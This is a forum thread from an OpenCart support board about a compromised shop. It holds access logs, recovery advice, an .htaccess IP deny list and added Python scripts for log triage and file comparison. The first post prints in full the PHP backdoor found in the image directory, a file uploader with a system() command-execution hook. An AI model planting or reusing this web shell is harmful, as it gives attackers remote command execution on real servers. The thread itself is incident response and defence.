Post by stinn » Fri May 12, 2017 3:47 am

Last night it appears that an IP from Europe began to attack my OC 2.3.0.2 install. It appears they may have accessed the admin side; the admin password has been changed.
The next standout from the logs is a file called index.php showing up in the images directory:

Code:

94.242.252.39 - - [11/May/2017:00:59:49 -0400] "GET /image/data/atlarge/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
This file contained an uploader that looks like this:

Code:

<?php
if(@$_REQUEST["id"]== 'jj')
{
$files = @$_FILES["files"];
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>shell</a></h1>";
}
}
exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}
if(@$_REQUEST["id"]== 'pp')
{
system($_GET["cmd"]);
}
?>
There is then a POST to this:

Code:

94.242.252.39 - - [11/May/2017:01:00:08 -0400] "POST /image/data/atlarge/index.php?id=jj HTTP/1.1" 200 190 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
This seems to have created web.php, as we start to see hits to that now:

Code:

94.242.252.39 - - [11/May/2017:01:00:14 -0400] "GET /image/data/atlarge/web.php HTTP/1.1" 200 40459 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=smiley HTTP/1.1" 200 92 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=folder HTTP/1.1" 200 90 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
94.242.252.39 - - [11/May/2017:01:00:15 -0400] "GET /image/data/atlarge/web.php?image=file HTTP/1.1" 200 93 "https://www.xxx.ca/image/data/atlarge/web.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/17.0 Firefox/17.0"
The web.php file is nowhere to be found on the server. The first thing I noticed this morning was that the site was not working: the front end was throwing 500 errors, while the backend was working normally. I found that a large number of files had been deleted before I realized there was an exploit, and re-uploading from a fresh download plus a Journal theme upload seemed to get the site up and running.
However, that's when I started combing through the logs, found all this, and put the site in maintenance mode. Any advice on how to get the site up and running securely again? I'm thinking obviously a fresh file install; what's the best way to do that with the database? Can I just dump the fresh download and replace the config files? This clearly attacked my images dir, but I need those; I've searched through the directory and found no more .php files in it.

Thanks in advance for any advice or guidance.
Last edited by stinn on Sun Feb 19, 2023 9:46 am, edited 2 times in total.

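The log lines quoted above are Apache combined-format entries. As an added example (not from the original post), this script parses such lines and flags every request to a .php file under the image tree, which should only serve static files, then lists the client addresses whose other requests need to be pulled from the full log. The sample lines are constructed from the ones in the post; the host name stays redacted as it was there.

```python
import re
from collections import defaultdict

# Constructed sample in Apache combined format, modelled on the lines quoted in the post
# (hostname redacted as there); one benign image request is added for contrast.
SAMPLE_LOG = """\
94.242.252.39 - - [11/May/2017:00:59:49 -0400] "GET /image/data/atlarge/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
94.242.252.39 - - [11/May/2017:01:00:08 -0400] "POST /image/data/atlarge/index.php?id=jj HTTP/1.1" 200 190 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0"
94.242.252.39 - - [11/May/2017:01:00:14 -0400] "GET /image/data/atlarge/web.php HTTP/1.1" 200 40459 "https://www.xxx.ca/image/data/atlarge/index.php?id=jj" "Mozilla/5.0"
203.0.113.7 - - [11/May/2017:01:02:00 -0400] "GET /image/data/atlarge/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# ip ident user [time] "method target protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# OpenCart's image tree only ever needs to serve static files, so any .php request
# under it is suspect regardless of the status code returned.
STATIC_ONLY = ("/image/",)

def parse_line(line):
    """Fields of one combined-format line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec

def flag_script_hits(log_text):
    """(ip, time, method, path, query, status) for each request to a .php file under a static-only directory."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].lower().endswith(".php") and rec["path"].startswith(STATIC_ONLY):
            hits.append((rec["ip"], rec["time"], rec["method"], rec["path"], rec["query"], rec["status"]))
    return hits

def ips_to_review(log_text):
    """Client IPs behind the flagged hits, with counts; every other request from these
    addresses is then pulled from the full log to find the original point of entry."""
    counts = defaultdict(int)
    for hit in flag_script_hits(log_text):
        counts[hit[0]] += 1
    return dict(counts)

if __name__ == "__main__":
    print(*flag_script_hits(SAMPLE_LOG), ips_to_review(SAMPLE_LOG), sep="\n")
```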

Post by IP_CAM » Fri May 12, 2017 7:37 am

Well, one would have to find out first how they got in, in the first place. And for this, your Server Setup and Logs,
going some time back, would have to be screened, as well as your Shop Installation, Files, Extensions, and Settings,
because they must have found a way in.

Or then, your own Software has sent them the Key, but such could only happen if the Key had already been
part of the Software, and this can only happen if one installed a Theme from the wrong Lower East Site of the web ::)
---
And if you use a Journal Theme Extension, you should upgrade, they just had some problems, a short while ago... ;)
I would get a DB Content Copy, to check on it, and delete/remove the existing Shop Directory, in FULL, to later
CREATE a new one. Then start again from upload + install, until everything works, and then restore existing data,
after the DB-Screen, back to its DB Place.

Good Luck !
Ernie
Last edited by IP_CAM on Fri May 12, 2017 7:45 am, edited 3 times in total.

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.



Post by stinn » Fri May 12, 2017 7:40 am

I was running an old version of Journal and I wonder if that's what did it; they seemed to be hitting some Journal js files. I have fully updated it now and fresh installed all files, only reusing images after going through all folders to ensure no shenanigans.


Post by ADD Creative » Fri May 12, 2017 7:40 pm

There has been a recent exploit with the Journal Theme. See viewtopic.php?f=179&t=183812. The last post suggested they have released a patch.

I would recommend you change the passwords to all the OpenCart admin accounts and to all FTP accounts. Remove all the PHP files from your image directory.

I would compare the files on your server with a clean install download from the OpenCart site to see if any changes have been made. Download the files and use a file comparison program to compare.

I would also look through the web logs and the FTP logs to see if you can work out how the /image/data/atlarge/index.php got on your server. Search for it in your logs or any other access from the same IP.

www.add-creative.co.uk


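The file comparison recommended above can be done without a GUI tool. As an added example (not from the post or from OpenCart), this script hashes a clean download and the live tree, reports files that were added, modified or deleted, and separately lists any server-side scripts sitting under image/. The two directory trees it builds are constructed sample data standing in for a real install.

```python
import hashlib
import os
import tempfile

def hash_tree(root):
    """Relative path -> SHA-256 hex digest of every file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def compare_trees(clean_root, live_root):
    """(added, modified, missing) paths of the live tree against the clean download.
    On a real install config.php and admin/config.php are expected to show as modified."""
    clean, live = hash_tree(clean_root), hash_tree(live_root)
    added = sorted(p for p in live if p not in clean)
    modified = sorted(p for p in live if p in clean and live[p] != clean[p])
    missing = sorted(p for p in clean if p not in live)
    return added, modified, missing

SCRIPT_EXTS = (".php", ".phtml", ".phar")

def scripts_in_upload_dir(live_root, upload_dir="image"):
    """Files the Apache PHP handler would execute inside the upload directory, as paths from live_root."""
    return sorted(upload_dir + "/" + p for p in hash_tree(os.path.join(live_root, upload_dir))
                  if p.lower().endswith(SCRIPT_EXTS))

def write(root, rel, data):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)

def build_demo():
    """Constructed sample trees: clean download vs. live site with an uploader dropped
    into image/, one tampered core file and one deleted file, as in the thread."""
    base = tempfile.mkdtemp()
    clean, live = os.path.join(base, "clean"), os.path.join(base, "live")
    for root in (clean, live):
        write(root, "index.php", b"<?php // front controller\n")
        write(root, "system/startup.php", b"<?php // startup\n")
        write(root, "image/data/atlarge/logo.png", b"\x89PNG constructed")
    write(live, "image/data/atlarge/index.php", b"<?php // uploader\n")
    write(live, "index.php", b"<?php // tampered\n")
    os.remove(os.path.join(live, "system/startup.php"))
    return clean, live
```

Point `compare_trees` at the unpacked download and the server's document root to get the three lists; anything in `added` that ends in a script extension deserves the same treatment as the uploader in this thread.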

Post by stinn » Fri May 12, 2017 10:39 pm

Passwords have all been changed. I completely replaced my html folder with a fresh download from the site, then copied the newest journal theme, then fresh downloaded all my extensions. The only files I moved from my older folder were images and that was after explicitly looking through all the folders for any php files. I'm fairly confident I'm clean now.
I'm going to continue to search through the logs to see if I can track down how or when that file was created but nothing stood out yesterday. It's also possible it happened a while ago and I'll need to go back in older logs.


Post by IP_CAM » Sat May 13, 2017 12:17 am

And just, to round this up, and under the aspect that my Servers momentarily get 'bombed'
on a daily scale, some of them also looking for Magento related leaks and holes. And in some
Countries, even Hospitals are out of order, because of the present attacks, all over the place.
---
My favoured Tool to check on IP's:
https://www.gaijin.at/en/dlet.php
---
Whoever is not required to leave a Site 'open' for anyone could always restrict access in a 'global'
way, by use of a SITE ROOT .htaccess, to deny entire Ranges, instead of (changing) IP-Addresses
only, from those trying to sneak in the wrong way, or do bad things.
It's one of those steps, hopefully adding a little to security...
Ernie

PS: On my commercial Clubs Sites, this list already contains 1140 such entries, out of a total
of 1819 htaccess Lines; after being in service for well over a decade, it was the only way
to keep it clean. ;) Still, it had no negative effect on any page load Test Result.
---
My latest List of denials, just re-updated, attempted WP Hacks, Saturday 0400:

Code:

Options +SymLinksIfOwnerMatch
# Tag requests whose User-Agent starts with "Wget" and refuse them.
# Note: this block covers GET and POST only; other methods fall outside it.
SetEnvIfNoCase User-Agent "^Wget" bad_bot
<Limit GET POST>
   Order Allow,Deny
   Allow from all
   Deny from env=bad_bot
</Limit>
# Prevent directory listing
Options -Indexes
# Network ranges denied for every file. A partial address with a trailing dot matches
# all addresses beginning with those octets, e.g. "94.242." covers 94.242.0.0/16.
<Files *>
   Order Allow,Deny
   Allow from all
   Deny from 5.77.34.
   Deny from 37.59.
   Deny from 37.128.
   Deny from 46.161.
   Deny from 46.229.
   Deny from 47.90.
   Deny from 50.63.
   Deny from 51.255.
   Deny from 63.243.
   Deny from 66.148.
   Deny from 69.49.
   Deny from 77.244.
   Deny from 80.82.
   Deny from 80.92.
   Deny from 80.190.
   Deny from 83.18.
   Deny from 88.76.
   Deny from 88.86.
   Deny from 91.121.
   Deny from 92.
   Deny from 93.104.
   Deny from 94.23.
   Deny from 94.177.
   Deny from 94.242.
   Deny from 98.124.
   Deny from 98.130.
   Deny from 98.131.
   Deny from 103.27.
   Deny from 108.167.
   Deny from 113.10.
   Deny from 125.
   Deny from 141.105.
   Deny from 145.87.
   Deny from 148.251.
   Deny from 149.56.
   Deny from 149.202.
   Deny from 149.255.
   Deny from 151.13.
   Deny from 163.172.
   Deny from 164.132.
   Deny from 168.144.
   Deny from 174.37.
   Deny from 178.250.
   Deny from 180.76.
   Deny from 182.50.
   Deny from 184.168.
   Deny from 184.172.
   Deny from 185.147.
   Deny from 188.234.
   Deny from 198.1.
   Deny from 198.2.
   Deny from 198.12.
   Deny from 200.9.
   Deny from 200.21.
   Deny from 200.75.
   Deny from 202.46.
   Deny from 203.124.
   Deny from 204.93.
   Deny from 213.251.
   Deny from 216.244.
   Deny from 217.28.
</Files>

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


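A deny list like the one above is easy to get wrong in both directions: a range can miss the address seen in the logs, or a short prefix can shut out far more of the internet than intended. As an added check (not part of Ernie's post), this script converts Apache "deny from" prefixes to networks, tests a client address against them, and totals how many addresses each list denies. The .htaccess fragment it parses is a constructed excerpt of the list above, not the full list.

```python
import ipaddress
import re

# Constructed excerpt of the deny list quoted above, not the complete list.
HTACCESS_EXCERPT = """\
<Files *>
order allow,deny
allow from all
deny from env=bad_bot
deny from 5.77.34.
deny from 92.
deny from 94.242.
deny from 125.
</Files>
"""

DENY_RE = re.compile(r"^\s*deny\s+from\s+(\S+)\s*$", re.IGNORECASE)

def prefix_to_network(token):
    """Apache accepts a full address, a CIDR block, or 1-3 leading octets (optionally
    ending in a dot) meaning "every address starting with these octets"."""
    if "/" in token:
        return ipaddress.ip_network(token, strict=False)
    octets = [o for o in token.split(".") if o]
    if not 1 <= len(octets) <= 4 or not all(o.isdigit() for o in octets):
        return None  # 'all', 'env=...' or a hostname: not an address range
    padded = ".".join(octets + ["0"] * (4 - len(octets)))
    return ipaddress.ip_network(f"{padded}/{8 * len(octets)}")

def parse_deny_ranges(htaccess_text):
    """All address ranges denied by 'deny from' lines in an .htaccess fragment."""
    nets = []
    for line in htaccess_text.splitlines():
        m = DENY_RE.match(line)
        if m and (net := prefix_to_network(m.group(1))) is not None:
            nets.append(net)
    return nets

def blocked_by(nets, ip):
    """The deny entries that match a given client address (e.g. the one in the logs)."""
    addr = ipaddress.ip_address(ip)
    return [n for n in nets if addr in n]

def review(nets, broad_if_shorter_than=16):
    """Total addresses denied, and the entries broader than a /16, which are the ones
    most likely to lock out legitimate customers along with the abusers."""
    total = sum(n.num_addresses for n in nets)
    broad = [n for n in nets if n.prefixlen < broad_if_shorter_than]
    return total, broad
```

Running `review` over the full list posted above shows at a glance that the two single-octet entries (92. and 125.) each deny a whole /8, sixteen million addresses apiece.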